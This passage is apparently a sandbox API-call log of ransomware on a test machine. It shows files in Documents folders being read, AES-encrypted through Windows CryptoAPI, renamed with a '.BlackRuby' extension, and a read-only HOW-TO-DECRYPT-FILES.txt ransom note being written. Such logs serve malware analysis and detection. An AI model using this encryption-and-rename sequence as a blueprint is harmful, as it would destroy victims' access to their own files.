[0058.640] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c89ef4*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c89ef4*, pdwDataLen=0x18ec50*=0x10) returned 1 [0058.640] GetLastError () returned 0x0 [0058.640] CryptDestroyKey (hKey=0x360ae0) returned 1 [0058.640] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.640] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.640] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", lpFilePart=0x0) returned 0x53 [0058.640] GetLastError () returned 0x0 [0058.640] SetErrorMode (uMode=0x1) returned 0x0 [0058.641] GetFileType (hFile=0x184) returned 0x1 [0058.641] GetFileType (hFile=0x184) returned 0x1 [0058.642] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\j2wcljwhs.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\Encrypted_HZyzx8FURA1cUklQ5eX2Dr7kVgRrDwUFBUUckrV7moxtKFc.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\encrypted_hzyzx8fura1cuklq5ex2dr7kvgrrdwufbuuckrv7moxtkfc.blackruby")) returned 1 [0058.643] GetLastError () returned 0xb7 [0058.644] SetErrorMode (uMode=0x0) returned 0x1 [0058.644] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0058.644] GetLastError () returned 0x5 [0058.644] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.644] GetLastError () returned 0x5 [0058.644] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.644] GetLastError () returned 0x5 [0058.644] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.644] GetLastError () returned 0x5 [0058.644] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.644] GetLastError () returned 0x5 [0058.645] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.645] GetLastError () returned 0x5 [0058.645] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.645] GetLastError () returned 0x12 [0058.645] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0058.645] SetErrorMode (uMode=0x0) returned 0x1 [0058.645] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm", lpFilePart=0x0) returned 0x51 [0058.645] GetLastError () returned 0x12 [0058.645] SetErrorMode (uMode=0x1) returned 0x0 [0058.645] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0058.645] GetLastError () returned 0x12 [0058.645] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.645] GetLastError () returned 0x12 [0058.645] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.645] GetLastError () returned 0x12 [0058.645] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.645] GetLastError () returned 0x12 [0058.646] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.646] GetLastError () returned 0x12 [0058.646] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.646] GetLastError () returned 0x12 [0058.646] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.646] GetLastError () returned 0x12 [0058.646] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0058.646] SetErrorMode (uMode=0x0) returned 0x1 [0058.646] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", lpFilePart=0x0) returned 0x62 [0058.646] GetLastError () returned 0x12 [0058.646] SetErrorMode (uMode=0x1) returned 0x0 [0058.646] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\kuoae0mger8t.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1cb0040 | out: lpFileInformation=0x1cb0040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffea3db0, ftCreationTime.dwHighDateTime=0x1d35340, ftLastAccessTime.dwLowDateTime=0xda0194a0, ftLastAccessTime.dwHighDateTime=0x1d3573b, ftLastWriteTime.dwLowDateTime=0xda0194a0, ftLastWriteTime.dwHighDateTime=0x1d3573b, nFileSizeHigh=0x0, nFileSizeLow=0x4bc6)) returned 1 [0058.646] GetLastError () returned 0x12 [0058.646] SetErrorMode (uMode=0x0) returned 0x1 [0058.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", lpFilePart=0x0) returned 0x62 [0058.647] GetLastError () returned 0x12 [0058.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", nBufferLength=0x105, lpBuffer=0x18e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", lpFilePart=0x0) returned 0x62 [0058.647] GetLastError () returned 0x12 [0058.647] SetErrorMode (uMode=0x1) returned 0x0 [0058.647] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\kuoae0mger8t.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.647] GetLastError () returned 0x0 [0058.647] GetFileType (hFile=0x184) returned 0x1 [0058.647] SetErrorMode (uMode=0x0) returned 0x1 [0058.647] GetFileType (hFile=0x184) returned 0x1 [0058.647] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec2c | out: lpFileSizeHigh=0x18ec2c*=0x0) returned 0x4bc6 [0058.647] GetLastError () returned 0x0 [0058.647] ReadFile (in: hFile=0x184, lpBuffer=0x1cb1c98, nNumberOfBytesToRead=0x4bc6, lpNumberOfBytesRead=0x18ebd4, lpOverlapped=0x0 | out: lpBuffer=0x1cb1c98*, lpNumberOfBytesRead=0x18ebd4*=0x4bc6, lpOverlapped=0x0) returned 1 [0058.648] GetLastError () returned 0x0 [0058.648] CloseHandle (hObject=0x184) returned 1 [0058.648] GetLastError () returned 0x0 [0058.648] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", nBufferLength=0x105, lpBuffer=0x18e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", lpFilePart=0x0) returned 0x62 [0058.648] GetLastError () returned 0x0 [0058.648] SetErrorMode (uMode=0x1) returned 0x0 [0058.648] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\kuoae0mger8t.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18ec3c | out: lpFileInformation=0x18ec3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffea3db0, ftCreationTime.dwHighDateTime=0x1d35340, ftLastAccessTime.dwLowDateTime=0xda0194a0, ftLastAccessTime.dwHighDateTime=0x1d3573b, ftLastWriteTime.dwLowDateTime=0xda0194a0, ftLastWriteTime.dwHighDateTime=0x1d3573b, nFileSizeHigh=0x0, nFileSizeLow=0x4bc6)) returned 1 [0058.648] GetLastError () returned 0x0 [0058.648] SetErrorMode (uMode=0x0) returned 0x1 [0058.648] CryptAcquireContextW (in: phProv=0x18eb9c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb9c*=0x37c790) returned 1 [0058.648] GetLastError () returned 0x0 [0058.682] CryptImportKey (in: hProv=0x37c790, pbData=0x1d15844, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb78 | out: phKey=0x18eb78*=0x360f60) returned 1 [0058.682] GetLastError () returned 0x0 [0058.682] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.682] GetLastError () returned 0x0 [0058.687] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.687] GetLastError () returned 0x0 [0058.687] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eb34 | out: phKey=0x18eb34*=0x360b20) returned 1 [0058.687] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.687] GetLastError () returned 0x0 [0058.687] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1d42890*=0x1, dwFlags=0x0) returned 1 [0058.687] GetLastError () returned 0x0 [0058.687] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1d4285c, dwFlags=0x0) returned 1 [0058.687] GetLastError () returned 0x0 [0058.687] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d428d8*, pdwDataLen=0x18ebc4*=0x4cc0, dwBufLen=0x4cc0 | out: pbData=0x1d428d8*, pdwDataLen=0x18ebc4*=0x4cc0) returned 1 [0058.688] GetLastError () returned 0x0 [0058.688] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d4c284*, pdwDataLen=0x18ebdc*=0x10, dwBufLen=0x10 | out: pbData=0x1d4c284*, pdwDataLen=0x18ebdc*=0x10) returned 1 [0058.688] GetLastError () returned 0x0 [0058.688] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d4c2b4*, pdwDataLen=0x18ebe4*=0x0, dwBufLen=0x10 | out: pbData=0x1d4c2b4*, pdwDataLen=0x18ebe4*=0x10) returned 1 [0058.688] GetLastError () returned 0x0 [0058.691] CryptDestroyKey (hKey=0x360f60) returned 1 [0058.691] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.691] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.691] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", nBufferLength=0x105, lpBuffer=0x18e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", lpFilePart=0x0) returned 0x62 [0058.691] GetLastError () returned 0x0 [0058.691] SetErrorMode (uMode=0x1) returned 0x0 [0058.691] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\kuoae0mger8t.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.692] GetLastError () returned 0xb7 [0058.692] GetFileType (hFile=0x184) returned 0x1 [0058.692] SetErrorMode (uMode=0x0) returned 0x1 [0058.692] GetFileType (hFile=0x184) returned 0x1 [0058.693] CloseHandle (hObject=0x184) returned 1 [0058.693] GetLastError () returned 0xb7 [0058.693] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf", lpFilePart=0x0) returned 0x62 [0058.693] GetLastError () returned 0xb7 [0058.693] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\Encrypted_NFaz41nKs1CwcR8SIUY0o7wmSKeQBNfixKpIs.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\Encrypted_NFaz41nKs1CwcR8SIUY0o7wmSKeQBNfixKpIs.BlackRuby", lpFilePart=0x0) returned 0x8b [0058.693] GetLastError () returned 0xb7 [0058.693] SetErrorMode (uMode=0x1) returned 0x0 [0058.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\kuoae0mger8t.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18ec24 | out: lpFileInformation=0x18ec24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffea3db0, ftCreationTime.dwHighDateTime=0x1d35340, ftLastAccessTime.dwLowDateTime=0xda0194a0, ftLastAccessTime.dwHighDateTime=0x1d3573b, ftLastWriteTime.dwLowDateTime=0x2b2e2620, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4cd0)) returned 1 [0058.693] GetLastError () returned 0xb7 [0058.693] SetErrorMode (uMode=0x0) returned 0x1 [0058.693] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\KUOae0MgeR8T.rtf" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\kuoae0mger8t.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\Encrypted_NFaz41nKs1CwcR8SIUY0o7wmSKeQBNfixKpIs.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\encrypted_nfaz41nks1cwcr8siuy0o7wmskeqbnfixkpis.blackruby")) returned 1 [0058.694] GetLastError () returned 0xb7 [0058.694] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6a [0058.694] GetLastError () returned 0xb7 [0058.694] SetErrorMode (uMode=0x1) returned 0x0 [0058.694] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.694] GetLastError () returned 0x0 [0058.694] GetFileType (hFile=0x184) returned 0x1 [0058.694] SetErrorMode (uMode=0x0) returned 0x1 [0058.694] GetFileType (hFile=0x184) returned 0x1 [0058.695] CloseHandle (hObject=0x184) returned 1 [0058.695] GetLastError () returned 0x0 [0058.695] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6a [0058.696] GetLastError () returned 0x0 [0058.696] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0058.696] GetLastError () returned 0x0 [0058.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", lpFilePart=0x0) returned 0x67 [0058.696] GetLastError () returned 0x0 [0058.696] SetErrorMode (uMode=0x1) returned 0x0 [0058.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\rkaickzvk3gcwccm2.ods"), fInfoLevelId=0x0, lpFileInformation=0x1b790ec | out: lpFileInformation=0x1b790ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8332030, ftCreationTime.dwHighDateTime=0x1d353e7, ftLastAccessTime.dwLowDateTime=0xa1dcafd0, ftLastAccessTime.dwHighDateTime=0x1d349fb, ftLastWriteTime.dwLowDateTime=0xa1dcafd0, ftLastWriteTime.dwHighDateTime=0x1d349fb, nFileSizeHigh=0x0, nFileSizeLow=0x12840)) returned 1 [0058.696] GetLastError () returned 0x0 [0058.696] SetErrorMode (uMode=0x0) returned 0x1 [0058.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", lpFilePart=0x0) returned 0x67 [0058.696] GetLastError () returned 0x0 [0058.696] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", nBufferLength=0x105, lpBuffer=0x18e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", lpFilePart=0x0) returned 0x67 [0058.696] GetLastError () returned 0x0 [0058.696] SetErrorMode (uMode=0x1) returned 0x0 [0058.696] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\rkaickzvk3gcwccm2.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.696] GetLastError () returned 0x0 [0058.696] GetFileType (hFile=0x184) returned 0x1 [0058.696] SetErrorMode (uMode=0x0) returned 0x1 [0058.696] GetFileType (hFile=0x184) returned 0x1 [0058.697] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec2c | out: lpFileSizeHigh=0x18ec2c*=0x0) returned 0x12840 [0058.697] GetLastError () returned 0x0 [0058.697] ReadFile (in: hFile=0x184, lpBuffer=0x1b7b280, nNumberOfBytesToRead=0x12840, lpNumberOfBytesRead=0x18ebd4, lpOverlapped=0x0 | out: lpBuffer=0x1b7b280*, lpNumberOfBytesRead=0x18ebd4*=0x12840, lpOverlapped=0x0) returned 1 [0058.697] GetLastError () returned 0x0 [0058.698] CloseHandle (hObject=0x184) returned 1 [0058.698] GetLastError () returned 0x0 [0058.698] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", nBufferLength=0x105, lpBuffer=0x18e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods", lpFilePart=0x0) returned 0x67 [0058.698] GetLastError () returned 0x0 [0058.698] SetErrorMode (uMode=0x1) returned 0x0 [0058.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\RKAickzVK3GCWCCM2.ods" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\rkaickzvk3gcwccm2.ods"), fInfoLevelId=0x0, lpFileInformation=0x18ec3c | out: lpFileInformation=0x18ec3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8332030, ftCreationTime.dwHighDateTime=0x1d353e7, ftLastAccessTime.dwLowDateTime=0xa1dcafd0, ftLastAccessTime.dwHighDateTime=0x1d349fb, ftLastWriteTime.dwLowDateTime=0xa1dcafd0, ftLastWriteTime.dwHighDateTime=0x1d349fb, nFileSizeHigh=0x0, nFileSizeLow=0x12840)) returned 1 [0058.698] GetLastError () returned 0x0 [0058.698] SetErrorMode (uMode=0x0) returned 0x1 [0058.698] CryptAcquireContextW (in: phProv=0x18eb9c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb9c*=0x37c790) returned 1 [0058.698] GetLastError () returned 0x0 [0058.739] CryptImportKey (in: hProv=0x37c790, pbData=0x1bfa738, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb78 | out: phKey=0x18eb78*=0x360ea0) returned 1 [0058.739] GetLastError () returned 0x0 [0058.739] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.739] GetLastError () returned 0x0 [0058.744] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.744] GetLastError () returned 0x0 [0058.744] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eb34 | out: phKey=0x18eb34*=0x360a20) returned 1 [0058.744] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.744] GetLastError () returned 0x0 [0058.744] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c27784*=0x1, dwFlags=0x0) returned 1 [0058.744] GetLastError () returned 0x0 [0058.744] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c27750, dwFlags=0x0) returned 1 [0058.744] GetLastError () returned 0x0 [0058.744] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c277cc*, pdwDataLen=0x18ebc4*=0x12940, dwBufLen=0x12940 | out: pbData=0x1c277cc*, pdwDataLen=0x18ebc4*=0x12940) returned 1 [0058.745] GetLastError () returned 0x0 [0058.745] 